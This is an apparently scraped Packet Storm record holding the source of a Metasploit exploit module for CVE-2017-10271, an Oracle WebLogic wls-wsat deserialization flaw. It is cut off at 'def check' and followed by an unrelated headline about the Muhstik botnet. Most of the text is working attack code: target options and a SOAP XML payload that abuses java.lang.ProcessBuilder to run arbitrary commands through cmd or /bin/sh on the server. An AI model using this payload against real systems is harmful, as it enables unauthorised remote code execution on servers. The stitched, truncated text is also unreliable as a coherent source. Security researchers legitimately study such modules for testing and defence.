"https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# include Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. \n# \ndef check
Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability
